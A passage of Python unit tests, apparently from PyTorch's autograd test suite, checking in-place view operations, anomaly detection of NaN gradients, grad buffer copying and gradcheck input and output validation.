self.assertTrue(hasattr(x, key))
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward0")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
def test_out_variant_raises_when_inputs_require_grad(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't throw warnings if there is an error
# but we'd want to at least see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
# We can test this by seeing whether Foo is not kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
# since if PyObject is not destroyed here, wouldn't this test would detect that also?
# The answer is that custom function's PyObject (THPFunction) actually only hold
# a weak reference to the c++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# when mkldnn inputs, forward mode testing is not allowed
# Update tolerances below to make sure the gradient match even in single precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while compute batched grad (print big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when encounter runtime error while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
